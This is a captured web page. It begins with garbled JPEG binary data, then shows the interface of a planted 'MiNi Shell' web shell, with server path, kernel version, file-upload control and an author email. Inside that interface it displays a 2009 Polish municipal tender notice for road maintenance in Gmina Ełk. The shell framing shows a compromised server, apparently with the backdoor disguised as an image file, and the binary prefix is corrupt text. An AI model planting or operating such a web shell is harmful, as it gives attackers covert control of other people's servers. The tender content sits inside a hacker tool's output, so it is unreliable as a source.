JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090127/10130-N-2009.html

<p class="kh_header"><b>Ełk: Usługi związane z bieżącym utrzymaniem oraz remontami dróg gminnych na terenie Gminy Ełk w 2009 r.</b><br>
<b>Numer ogłoszenia: 10130 - 2009; data zamieszczenia: 27.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Ełku , ul. Armii Krajowej 3, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6104437, faks 087 6103762.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.elk.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi związane z bieżącym utrzymaniem oraz remontami dróg gminnych na terenie Gminy Ełk w 2009 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)	Przedmiotem zamówienia są Usługi związane z bieżącym utrzymaniem oraz remontami dróg gminnych na terenie Gminy Ełk w 2009 r. .
                  45.23.31.42 - Roboty w zakresie naprawy dróg
                  45.23.32.20 - Roboty w zakresie nawierzchni dróg
                  45.23.32.23 - Wymiana nawierzchni drogowej

b)	Szczegółowy zakres rzeczowy przedmiotu zamówienia:
1 godz. pracy równiarki przy robotach ziemnych
wyprofilowanie 1 km drogi z dwukrotnym przejściem równiarki.
Wykonawca musi posiadać min. 2 równiarki samobieżne.
1 godz. pracy samochodu samowyładowczego o ład. pow. 15 t przy różnych robotach utrzymaniowych.
1 godz. pracy samochodu samowyładowczego o ład. od 10 do 15 t. przy różnych robotach utrzymaniowych. Wykonawca musi posiadać min. 2 samochody, w tym jeden z dźwigiem samochodowym HDS niezbędnym do załadunku, rozładunku i przewozu przepustów drogowych.
1 godz. pracy  koparki o poj. łyżki min. 0,9 m3 przy różnych robotach utrzymaniowych
1 godz. pracy koparko-ładowarki przy różnych robotach utrzymaniowych
1 godz. pracy ładowarki o poj. łyżki min. 3 m3 przy różnych robotach utrzymaniowych
1 godz. pracy  walca drogowego z wibracją
1 godz. pracy zwyżki min. 12 m wysięgnika przy różnych pracach związanych z wycinką drzew
1 godz. pracy kosiarki, zakres prac to koszenie traw i chwastów po obu stronach poboczy dróg gminnych, koszenie traw i chwastów w obrębie skrzyżowań z drogami podporządkowanymi od strony łuków dróg w celu zwiększenia widoczności dla kierujących pojazdami. Kompleksowe koszenie poboczy i skrzyżowań na terenie Gminy Ełk odbywać będzie się 2 razy do roku. Pierwsze do 30 czerwca 2009 r. oraz drugie  do 15 września 2009r.

Typowanie robót wykonywane będzie sukcesywnie w miarę potrzeb Zamawiającego.

Gmina Ełk posiada około 100 km dróg gminnych przeznaczonych do bieżącego utrzymania.

c)   Zaleca się, aby oferent zdobył wszelkie informacje, które mogą być koniczne do przygotowania oferty i podpisania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.23-8, 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca ubiegający się o udzielenie zamówienia jest obowiązany wnieść wadium przed upływem terminu składania ofert w wysokości 5 000  zł. pięć tysięcy złotych

Nie wniesienie wadium w wymaganym terminie, wymaganej wysokości i formie zgodnie z art. 24 ust. 2 pkt 4 Ustawy - Pzp - skutkuje wykluczeniem wykonawcy z postępowania.

Wadium może być wnoszone w jednej lub kilku następujących formach:
1.	Pieniądzu;
2.	Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3.	Gwarancjach bankowych;
4.	Gwarancjach ubezpieczeniowych;
5.	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 42, poz. 275 z 2007r.).

Wadium wnoszone w pieniądzu, wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego: 54 9331 0004 0000 0010 9080 0004 Bank Spółdzielczy w Ełku, z dopiskiem: Wadium w przetargu nr ZP.3441 1 2009. 
Za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 14.1	 Wymagania i zalecenia ogólne
Oferta powinna być przygotowana z uwzględnieniem poniższych zasad:
1)	Każdy wykonawca może złożyć tylko jedną ofertę.
2)	Wymaga się, pod rygorem nieważności, by oferta była przygotowana w formie pisemnej  zapewniającej pełną czytelność jej treści.
3)	Wszystkie oświadczenia i zaświadczenia składane przez oferentów wymagają formy pisemnej.
4)	Oferta musi odpowiadać treści Specyfikacji Istotnych Warunków Zamówienia.
5)	Składający ofertę winien zastrzec, jakie dokumenty i informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, nie mogą być udostępniane innym oferentom.
6)	Ofertę należy sporządzić w języku polskim pod rygorem nieważności.
7)	Wykonawca zamieści ofertę w wewnętrznej i zewnętrznej kopercie, które:
-	będą zaadresowane do zamawiającego, na adres podany w pkt. 1,
-	będą posiadały oznaczenia - Przetarg nieograniczony - Usługi związane z bieżącym utrzymaniem oraz remontami dróg gminnych na terenie Gminy Ełk w 2009 r.  -  z dopiskiem nie otwierać przed 04.02.2009r. godz. 910

Koperta wewnętrzna będzie posiadać nazwę i adres wykonawcy.

Uwaga !
Na kopercie zewnętrznej nie należy podawać nazwy i adresu wykonawcy.
8)	Wszystkie strony oferty muszą być spięte, zszyte w sposób zapobiegający możliwości jej dekompletowania.
9)	Wymaga się, by oferta była podpisana przez osobę lub osoby uprawnione do zaciągania zobowiązań, a wszystkie strony oferty parafowane.
10)	Wszystkie strony oferty powinny być ponumerowane.
11)	Wymaga się, aby wszelkie poprawki były dokonane w sposób czytelny i dodatkowo opatrzone datą dokonania poprawki oraz parafą osoby podpisującej ofertę.

14.2	 Wyjaśnienia i zmiana treści SIWZ
1)	Wykonawca może zwrócić się do zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający niezwłocznie udzieli wyjaśnień, chyba że prośba o wyjaśnienie wpłynęła do zamawiającego na mniej niż 6 dni przed terminem składania ofert; 
2)	Treść zapytań wraz z wyjaśnieniami zamawiający przekaże wykonawcom, którym przekazał specyfikację istotnych warunków zamówienia, bez ujawniania źródła zapytania a jeżeli specyfikacja jest udostępniana na stronie internetowej, zamieszcza na tej stronie.
3)	W uzasadnionych przypadkach zamawiający  może przed upływem terminu składania ofert  zmienić treść specyfikacji istotnych warunków zamówienia. Dokonaną w ten sposób zmianę zamawiający przekaże niezwłocznie wszystkim wykonawcom, którym przekazano specyfikację istotnych warunków zamówienia a jeżeli specyfikacja jest udostępniana na stronie internetowej, zamieszcza na tej stronie.
4)	Zamawiający przedłuża termin składania ofert i informuje o tym Wykonawców, którym przekazano SIWZ, jeżeli w wyniku zmiany jej treści niezbędny jest dodatkowy czas na wprowadzenie zmian w ofertach. 
5)	Zamawiający nie przewiduje zwołania zebrania wykonawców w celu wyjaśnienia wątpliwości dotyczących treści specyfikacji istotnych warunków zamówienia.

      14.3 Zmiana i wycofanie oferty
1)	wykonawca  może, przed upływem terminu do składania ofert, zmienić lub wycofać ofertę. Zarówno zmiana jak i wycofanie oferty wymagają zachowania formy pisemnej,
2)	zmiany dotyczące treści oferty powinny być przygotowane, opakowane i zaadresowane  
w ten sam sposób co oferta. Dodatkowo opakowanie, w którym jest   przekazywana  zmieniona oferta należy opatrzyć napisem  Zmiana oferty  i  numerem sprawy. 
3)	powiadomienie o wycofaniu oferty powinno być opakowane  i zaadresowane w ten sam sposób co oferta. Dodatkowo opakowanie w którym jest przekazywanie powiadomienie, należy opatrzyć napisem  Wycofanie oferty  i numerem sprawy.
4)	Koperty oznaczone dopiskiem Zmiana ofertyoraz Wycofanie oferty  będą otwierane w pierwszej kolejności, bezpośrednio przed ofertą, której dotyczą.
5)	Oferty, które zostaną wycofane nie będą otwarte. 

I. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone   w art. 22 ust. 1 ustawy - Pzp, tj.:
1)	 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)	 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 Ustawy-Pzp.

II. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia.

1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
2)	W przypadku, o którym mowa w pkt. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnik zwraca się do zamawiającego z wszelkimi sprawami i do niego zamawiający kieruje informacje, korespondencję itp.
3)	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, o których mowa w pkt. 1.  
4)	Jeżeli oferta wykonawców o których mowa w pkt. 1 została wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, dostarczenia umowy regulującej  współpracę tych wykonawców, która będzie zawierała co najmniej:
a) zobowiązanie do realizacji  wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia oraz ich solidarną odpowiedzialność za wykonanie zamówienia,
b)   określenie zakresu działania poszczególnych stron umowy,
c)  czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi.
Dokument należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
5)	Wykonawcy, o których mowa w pkt. 1 ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.


Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: Ocena spełniania warunków będzie dokonywana na podstawie złożonych dokumentów, wymienionych w SIWZ, metodą spełnia /nie spełnia, stosując ocenę zerojedynkową. Ocena spełnienia ww. warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach załączonych do oferty. Z treści dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełniania warunków udziału w postępowaniu Wykonawcy są obowiązani przedłożyć:
1.	Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, (wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert lub potwierdzenie aktualności przez organ wydający wypis)-(w przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy).
2.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. (w przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy).

3.	Aktualne zaświadczenie właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. (w przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy).

4.	wykonawca dołączy polisę lub inny dokument potwierdzający, że wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczeniową nie niższą niż 50.000,00 zł

5.	Wypełniony formularz ofertowy- (załącznik Nr 1)
6.	Oświadczenie oferenta, że nie podlega wykluczeniu z postępowania na podstawie art. 24
ust. 1 i spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych
( na załączonym druku ) - (załącznik Nr 2)
7.	Zaakceptowany projekt umowy ( na załączonym druku ) - (załącznik Nr 3)
8.	Wykażą się wykonaniem w okresie ostatnich trzech lat, co najmniej dwóch usług odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot niniejszego zamówienia, (każde zamówienie o wartości min. 100 tys. zł brutto). Załączyć wykaz wykonanych usług z podaniem wartości, przedmiotu, dat usług i odbiorców oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie (referencje)- (Załącznik Nr 4).
9.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada Wykonawca - (Załącznik nr 5),
Wymagane dokumenty mogą być przedstawione w formie oryginałów lub kserokopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania oferenta.
W złożonej ofercie dokumenty powinny być złożone w takiej kolejności jak są wymienione w punkcie 9 SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.elk.gmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ełk 
ul. Armii Krajowej 3, 19-300 Ełk
pok. 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2009 godzina 09:00, miejsce: Urząd Gminy Ełk 
ul. Armii Krajowej 3, 19-300 Ełk
pok.1 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com